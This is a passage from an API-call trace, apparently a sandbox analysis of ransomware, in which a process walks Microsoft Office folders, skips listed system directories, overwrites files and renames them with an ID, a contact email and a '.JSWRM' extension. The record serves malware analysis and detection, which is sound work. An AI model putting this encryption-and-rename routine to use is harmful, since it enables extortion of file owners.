dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0135.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0135.907] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b2049f6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b2049f6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b2049f6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6de, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WHOOSH.WAV", cAlternateFileName="")) returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2=".") returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="..") returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="...") returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="windows") returned -1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="recovery") returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="perflogs") returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="documents and settings") returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="$RECYCLE.BIN") returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="system volume information") returned 1 [0135.907] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="msocache") returned 1 [0135.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0135.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHOOSH.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHOOSH.WAV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WHOOSH.WAV", lpUsedDefaultChar=0x0) returned 10 [0135.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0135.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0135.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHOOSH.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHOOSH.WAV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WHOOSH.WAV", lpUsedDefaultChar=0x0) returned 10 [0135.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0135.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0135.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0135.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0135.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\whoosh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.909] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1758) returned 1 [0135.909] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6d0) returned 0x20c6c0 [0135.909] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x6d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x6d0, lpOverlapped=0x0) returned 1 [0135.910] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.910] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x6d0, lpOverlapped=0x0) returned 1 [0135.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0135.911] CloseHandle (hObject=0x238) returned 1 [0135.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0135.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0135.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0135.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0135.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0135.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0135.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0135.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0135.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.911] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\whoosh.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\WHOOSH.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\whoosh.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0135.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0135.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0135.912] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b2049f6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b2049f6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b2049f6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b84, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WIND.WAV", cAlternateFileName="")) returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2=".") returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="..") returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="...") returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="windows") returned -1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="recovery") returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="perflogs") returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="documents and settings") returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="$RECYCLE.BIN") returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="system volume information") returned 1 [0135.912] lstrcmpiW (lpString1="WIND.WAV", lpString2="msocache") returned 1 [0135.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0135.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WIND.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WIND.WAV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WIND.WAV", lpUsedDefaultChar=0x0) returned 8 [0135.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0135.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0135.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WIND.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WIND.WAV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WIND.WAV", lpUsedDefaultChar=0x0) returned 8 [0135.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0135.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0135.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0135.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0135.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\WIND.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\wind.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.914] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11140) returned 1 [0135.914] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x27b348 [0135.914] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2b80, lpOverlapped=0x0) returned 1 [0135.916] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.916] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2b80, lpOverlapped=0x0) returned 1 [0135.916] CloseHandle (hObject=0x238) returned 1 [0135.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\WIND.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\wind.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\WIND.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\wind.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.917] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b2049f6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b2049f6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b2049f6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b84, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WIND.WAV", cAlternateFileName="")) returned 0 [0135.917] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0135.917] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x38b7c4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MeetingJoinAxOC.dll", cAlternateFileName="MEETIN~1.DLL")) returned 1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2=".") returned 1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="..") returned 1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="...") returned 1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="windows") returned -1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="recovery") returned -1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="perflogs") returned -1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="documents and settings") returned 1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="$RECYCLE.BIN") returned 1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="system volume information") returned -1 [0135.918] lstrcmpiW (lpString1="MeetingJoinAxOC.dll", lpString2="msocache") returned -1 [0135.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MeetingJoinAxOC.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0135.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MeetingJoinAxOC.dll", cchWideChar=19, lpMultiByteStr=0x241060, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MeetingJoinAxOC.dll", lpUsedDefaultChar=0x0) returned 19 [0135.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MeetingJoinAxOC.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0135.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MeetingJoinAxOC.dll", cchWideChar=19, lpMultiByteStr=0x241010, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MeetingJoinAxOC.dll", lpUsedDefaultChar=0x0) returned 19 [0135.918] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca4703d4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9e08e14, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xda95c127, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5644a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mfc140u.dll", cAlternateFileName="")) returned 1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2=".") returned 1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="..") returned 1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="...") returned 1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="windows") returned -1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="recovery") returned -1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="perflogs") returned -1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="documents and settings") returned 1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="$RECYCLE.BIN") returned 1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="system volume information") returned -1 [0135.918] lstrcmpiW (lpString1="mfc140u.dll", lpString2="msocache") returned -1 [0135.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mfc140u.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mfc140u.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mfc140u.dll", lpUsedDefaultChar=0x0) returned 11 [0135.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mfc140u.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mfc140u.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mfc140u.dll", lpUsedDefaultChar=0x0) returned 11 [0135.918] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b2049f6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x152b4, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.Lync.Model.zip", cAlternateFileName="MICROS~1.ZIP")) returned 1 [0135.918] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2=".") returned 1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="..") returned 1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="...") returned 1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="windows") returned -1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="recovery") returned -1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="perflogs") returned -1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="documents and settings") returned 1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="$RECYCLE.BIN") returned 1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="system volume information") returned -1 [0135.919] lstrcmpiW (lpString1="Microsoft.Lync.Model.zip", lpString2="msocache") returned -1 [0135.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Model.zip", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0135.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Model.zip", cchWideChar=24, lpMultiByteStr=0x240f70, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Lync.Model.zip", lpUsedDefaultChar=0x0) returned 24 [0135.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Model.zip", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0135.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Model.zip", cchWideChar=24, lpMultiByteStr=0x2411f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Lync.Model.zip", lpUsedDefaultChar=0x0) returned 24 [0135.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Model.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.model.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0135.920] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=86708) returned 1 [0135.920] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.920] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x152b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x152b0, lpOverlapped=0x0) returned 1 [0135.926] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.926] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x152b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x152b0, lpOverlapped=0x0) returned 1 [0135.928] CloseHandle (hObject=0x45c) returned 1 [0135.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Model.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.model.zip"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Model.zip.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.model.zip.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.929] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b1de7ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7072, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.Lync.Utilities.Controls.zip", cAlternateFileName="MICROS~2.ZIP")) returned 1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2=".") returned 1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="..") returned 1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="...") returned 1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="windows") returned -1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="recovery") returned -1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="perflogs") returned -1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="documents and settings") returned 1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="$RECYCLE.BIN") returned 1 [0135.929] lstrcmpiW 